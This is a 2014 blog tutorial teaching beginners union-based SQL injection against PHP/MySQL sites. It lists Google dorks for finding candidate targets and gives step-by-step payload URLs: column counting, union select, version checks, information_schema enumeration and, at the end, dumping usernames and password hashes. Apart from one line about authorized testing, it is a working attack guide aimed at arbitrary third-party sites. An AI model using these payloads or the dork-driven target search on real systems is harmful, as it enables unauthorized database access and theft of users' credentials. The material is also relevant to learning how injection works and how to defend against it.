Monday, 10 November 2014

SQL Injection Tutorial For Beginners


What is a SQL Injection?

SQL injection is a bug in a website that takes something you typed (here, the id= value in the URL) and pastes it straight into a database query without checking it. Because the database cannot tell the site's own SQL from your text, you can change what the query does. This tutorial covers the simplest form, error-based and union-based injection against a MySQL database behind a PHP site.

What can I do with an SQLi?

You can read data the page was never meant to show, such as usernames, password hashes, e-mail addresses and locations, and, if the database account the site uses has the rights, change data or put your own content on the site.

Is it hard to do?

At first it may take some time to get used to the queries, but after some practice it's very easy.

Will I get caught?

Quite possibly. Every request you send, injected query string included, ends up in the web server's access log, and strings like "union select" and "order by" in a URL are exactly what intrusion detection signatures and web application firewalls look for. A proxy or VPN (Virtual Private Network) hides your address, not the attack, so only do this on systems you are authorized to test. I suggest reading the Proxies and Socks forum on here to learn more about what proxies and VPNs are.

What is a dork?
A dork is a search query, usually built from Google operators such as inurl:, that matches the URL pattern of a particular kind of page. In SQL injection you search for dorks to find pages that take a numeric parameter (like index.php?id=) and so may pass it into a database query.

Injection Tutorial
Step 1.

Search Google for one of the dorks below and open one of the websites that shows up.

Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=


So what does a dork do?
It's just a way of searching. Each of the dorks above returns pages whose URL takes an id= parameter. Such a page is only a candidate: it is not known to be vulnerable until you test it in Step 2.


Step 2. Once you have found a site, check whether it is vulnerable to a SQL Injection.

So let's say we have a site like this
http://www.site.com/index.php?id=1

Put a ' (single quote) after the number. If the site pastes the parameter into its query unquoted, the quote opens a string that is never closed and the database rejects the whole query, which the site then shows as an error:
http://www.site.com/index.php?id=1'

You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1" or something similar. A quick second check is id=1 and 1=1 (page unchanged) against id=1 and 1=2 (page blank or missing its content): if the page changes but no error text appears, the injection is probably there but blind, which this tutorial does not cover.


Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns the query selects. We use the "order by" clause to do this: order by n sorts the result by the n-th selected column, and MySQL returns an error ("Unknown column '9' in 'order clause'") as soon as n is larger than the number of columns.

http://www.site.com/index.php?id=1 order by 10

I suggest you go by 10's. If order by a number shows an error, try a lower number. You are looking for the largest number that gives no error; the number right after it must give an error.

So let's say we did:

order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)

What this means is that the query selects 8 columns.

Step 4. Now that we have the number of columns, it's time to find out which columns the page actually prints, so that we can put our data there. We do this by putting a "-" minus sign after the = equals sign in the URL, so that id=-1 matches no real row, and adding a union select with one number per column, separated by commas. A union select appends our own row to the query's result, and it only works when it has exactly as many columns as the original query, which is why Step 3 came first.

So here's how it should look:
http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8

Since the original row is gone, the page renders our row instead, and one or more of the numbers show up on screen. Each visible number tells you a column position whose content the page prints.

Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is printed on the page, so anything we put in that position is shown to us. Now we need to get the version of the database. We do this with the @@version system variable (version() works too).

http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8

Replace the number 2 in the URL with @@version and the version string shows up on your screen. What matters is whether it starts with 5 or higher (MariaDB included), which has the information_schema database used below, or with 4, which does not.

For MySQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the names of the tables in the database. We use the group_concat(table_name) function, which joins all the names into one comma-separated string so they fit in the single printed column. From version 5 onwards MySQL keeps a catalogue database called information_schema, and its tables table lists every table the account can see. The -- at the end is a comment marker: it throws away whatever the site's own query had after our injected text (MySQL needs a space after --, so in a URL write --+ or -- - to keep it).

http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

To list only the site's own database rather than the system tables as well, add where table_schema=database() before the --. Keep in mind that group_concat output is cut off at 1024 characters by default, so on a large database you may have to page through the names with limit instead.

Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now look for anything that might contain the usernames and passwords of the people who use the website. Some common ones are users, admin, members, staff, user, etc.

Step 3. Once you have found a table that might contain the usernames and passwords, it's time to get the names of the columns within that table. We use group_concat(column_name) for this, and once again, in version 5, the column list is in information_schema.columns.

After information_schema.columns you need to tell the database which table you want the columns of, so after .columns you put where table_name=(name of table in hex form).
The hex form is used instead of 'users' because the quote characters in a normal string literal are often escaped by the site (PHP's magic_quotes or addslashes), which would break the query; MySQL reads 0x7573657273 as the string 'users' without any quotes being needed. To convert the table name, use any text-to-hex converter, put 0x in front of the result and paste it after the = equals sign. If the same table name exists in several databases, add and table_schema=database() as well.

So after all that it should look like this:
http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273

The names of the columns should pop up on your screen.

Step 4. Now that you have the column names within the table you chose, it's time to extract the data. Once again, we will use the group_concat function.

Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (the table name you chose in plain text form this time, not hex, because here it is a table name and not a string value). 0x3a is the hex form of a colon, which separates each username from its password so you don't get confused. After you've done this, your URL should look like this:

http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--

Now the usernames should show up, each followed by a colon and that user's password. On most sites the password column holds a hash (an MD5 hash is 32 hex characters, for example) rather than the password itself.


Thank you for reading

